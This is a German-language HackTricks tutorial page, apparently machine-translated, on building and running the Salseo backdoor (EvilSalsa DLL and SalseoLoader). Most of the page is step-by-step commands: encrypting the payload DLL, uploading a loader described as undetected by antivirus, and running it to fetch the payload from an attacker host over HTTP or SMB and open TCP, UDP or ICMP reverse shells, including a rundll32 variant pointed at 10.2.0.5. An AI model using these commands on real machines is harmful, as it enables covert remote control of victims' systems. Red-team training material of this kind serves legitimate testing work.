Salseo

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Kompilieren der Binärdateien

Laden Sie den Quellcode von GitHub herunter und kompilieren Sie EvilSalsa und SalseoLoader. Sie benötigen Visual Studio, um den Code zu kompilieren.

Kompilieren Sie diese Projekte für die Architektur des Windows-Systems, auf dem Sie sie verwenden werden (Wenn Windows x64 unterstützt, kompilieren Sie sie für diese Architekturen).

Sie können die Architektur auswählen innerhalb von Visual Studio im linken "Build" Tab unter "Platform Target".

(**Wenn Sie diese Optionen nicht finden können, klicken Sie auf "Project Tab" und dann auf "<Project Name> Properties")

Bauen Sie dann beide Projekte (Build -> Build Solution) (Im Log wird der Pfad der ausführbaren Datei angezeigt):

Bereiten Sie die Backdoor vor

Zunächst müssen Sie die EvilSalsa.dll verschlüsseln. Dazu können Sie das Python-Skript encrypterassembly.py verwenden oder das Projekt EncrypterAssembly kompilieren:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, jetzt hast du alles, was du brauchst, um das gesamte Salseo-Ding auszuführen: die codierte EvilDalsa.dll und das Binärfile des SalseoLoader.

Lade das SalseoLoader.exe-Binärfile auf die Maschine hoch. Es sollte von keinem AV erkannt werden...

Führe das Backdoor aus

Erhalten einer TCP-Reverse-Shell (Herunterladen der codierten dll über HTTP)

Denke daran, einen nc als Reverse-Shell-Listener zu starten und einen HTTP-Server zu starten, um das codierte evilsalsa bereitzustellen.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Erhalten einer UDP-Reverse-Shell (Herunterladen einer codierten DLL über SMB)

Denken Sie daran, einen nc als Reverse-Shell-Listener zu starten und einen SMB-Server bereitzustellen, um das codierte evilsalsa zu bedienen (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Erhalt eines ICMP-Reverse-Shells (codierte DLL bereits im Opfer)

Dieses Mal benötigen Sie ein spezielles Tool im Client, um den Reverse-Shell zu empfangen. Downloaden Sie: https://github.com/inquisb/icmpsh

Deaktivieren von ICMP-Antworten:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Führen Sie den Client aus:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Innerhalb des Opfers führen wir das Salseo-Ding aus:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Kompilieren von SalseoLoader als DLL und Exportieren der Hauptfunktion

Öffnen Sie das SalseoLoader-Projekt mit Visual Studio.

Fügen Sie vor der Hauptfunktion hinzu: [DllExport]

Installieren Sie DllExport für dieses Projekt

Tools --> NuGet-Paket-Manager --> NuGet-Pakete für Lösung verwalten...

Suchen Sie nach dem DllExport-Paket (über die Registerkarte Durchsuchen) und klicken Sie auf Installieren (und akzeptieren Sie das Popup)

In Ihrem Projektordner sind die Dateien DllExport.bat und DllExport_Configure.bat erschienen

Deinstallieren Sie DllExport

Klicken Sie auf Deinstallieren (ja, es ist seltsam, aber vertrauen Sie mir, es ist notwendig)

Visual Studio beenden und DllExport_Configure ausführen

Einfach Visual Studio beenden

Gehen Sie dann zu Ihrem SalseoLoader-Ordner und führen Sie DllExport_Configure.bat aus

Wählen Sie x64 (wenn Sie es in einer x64-Box verwenden möchten, das war mein Fall), wählen Sie System.Runtime.InteropServices (innerhalb von Namespace für DllExport) und klicken Sie auf Anwenden

Öffnen Sie das Projekt erneut mit Visual Studio

[DllExport] sollte nicht mehr als Fehler markiert sein

Lösung erstellen

Wählen Sie Ausgabetyp = Klassenbibliothek (Projekt --> SalseoLoader-Eigenschaften --> Anwendung --> Ausgabetyp = Klassenbibliothek)

Wählen Sie die x64-Plattform (Projekt --> SalseoLoader-Eigenschaften --> Erstellen --> Zielplattform = x64)

Um die Lösung zu erstellen: Build --> Lösung erstellen (Im Ausgabekonsole wird der Pfad der neuen DLL angezeigt)

Testen Sie die generierte Dll

Kopieren Sie die Dll und fügen Sie sie ein, wo Sie sie testen möchten.

Ausführen:

rundll32.exe SalseoLoader.dll,main

Wenn kein Fehler angezeigt wird, haben Sie wahrscheinlich eine funktionierende DLL!!

Erhalten Sie eine Shell unter Verwendung der DLL

Vergessen Sie nicht, einen HTTP Server zu verwenden und einen nc Listener einzurichten

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

Befehlszeile

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated